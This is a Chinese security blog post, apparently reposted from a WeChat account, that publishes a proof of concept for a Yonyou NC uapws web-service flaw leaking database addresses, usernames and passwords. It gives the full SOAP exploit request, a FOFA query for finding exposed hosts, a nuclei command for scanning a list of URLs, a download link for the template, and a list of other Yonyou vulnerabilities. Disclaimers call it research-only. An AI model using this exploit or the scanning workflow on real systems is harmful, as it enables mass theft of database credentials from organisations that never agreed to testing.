用友nc uapws接口获取数据库账户密码 nuclei

admin
admin
admin
138635
文章
114
评论
2023年2月2日01:22:35评论323 views字数 1427阅读4分45秒阅读模式
用友nc uapws接口获取数据库账户密码 nuclei
文章声明
安全文章技术仅供参考,此文所提供的信息为漏洞靶场进行渗透,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。
本文所提供的工具仅用于学习,禁止用于其他,未经授权,严禁转载,如需转载私信联系。
用友nc uapws接口获取数据库账户密码 nuclei

用友nc service接口信息泄露漏洞 nuclei

文章简介

用友nc uapws接口老版本存在数据库账号密码泄露,前面写过接口poc,补充一个获取数据库用户密码的poc。

网络测绘

app="用友-UFIDA-NC"

复现过程

利用请求包

POST /uapws/service/nc.itf.ses.inittool.PortalSESInitToolService HTTP/1.1Host: {{Hostname}}User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Content-Type: application/x-www-form-urlencoded
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:por="http://inittool.ses.itf.nc/PortalSESInitToolService"> <soapenv:Header/> <soapenv:Body>    <por:getDataSourceConfig/> </soapenv:Body></soapenv:Envelope

用友nc uapws接口获取数据库账户密码 nuclei

可获取数据库地址,用户名密码

nuclei-pocs

nuclei -t yonyou_NC-uapws-database-read.yaml -l url.txt

下载:

https://pan.baidu.com/s/1uwkimwto4QZASUmE6asS1g?pwd=1012

用友nc uapws接口获取数据库账户密码 nuclei

用友漏洞待更新记录(已更新19)

  • 用友 U8 OA test.jsp SQL注入漏洞
  • 用友nc v6.5 远程命令执行漏洞(CNVD-2021-30167
  • 用友 畅捷通T+ DownloadProxy.aspx 任意文件读取漏洞
  • 用友 畅捷通T+ RecoverPassword.aspx 管理员密码修改漏洞
  • 用友 畅捷通T+ Upload.aspx 任意文件上传漏洞
  • 用友 U8 OA getSessionList.jsp 敏感信息泄漏漏洞
  • 用友 NC NCFindWeb 任意文件读取漏洞
  • 用友 GRP-U8 Proxy SQL注入 CNNVD-201610-923
  • 用友 GRP-U8 UploadFileData 任意文件上传漏洞
  • 用友 FE协作办公平台 templateOfTaohong_manager.jsp 目录遍历漏洞
  • 用友nc 控制台绕过漏洞
  • 用友 NC 系统 uapws wsdl XXE(2022hw)
  • 用友时空KSOA软件前台文件上传漏洞(2022hw)
  • 用友nc v6.5 反射型xss
  • 用友nc接口信息泄露漏洞
  • 用友GRP-U8 财务管理软件servlet
  • 用友 NCCloud FS文件管理SQL注入
  • 用友nc uapws接口获取数据库账户密码
    • 用友nc v6.5 反序列化漏洞 补丁绕过
  • 用友nc v6.5 反序列化漏洞
  • (CNVD-2021-37786)用友nc Cloud FS 文件管理系统 任意账户登录漏洞
  • 用友nc IUFO v5

    • 用友nc uapws接口获取数据库账户密码 nuclei
    用友nc uapws接口获取数据库账户密码 nuclei

    用友nc uapws接口获取数据库账户密码 nuclei

    用友nc uapws接口获取数据库账户密码 nuclei

    原文始发于微信公众号(北极星sec):用友nc uapws接口获取数据库账户密码 nuclei

    免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
    • 左青龙
    • 微信扫一扫
    • weinxin
    • 右白虎
    • 微信扫一扫
    • weinxin
    admin
    • 本文由 发表于 2023年2月2日01:22:35
    • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                     用友nc uapws接口获取数据库账户密码 nucleihttps://cn-sec.com/archives/1344937.html
                    免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

    发表评论

    匿名网友 填写信息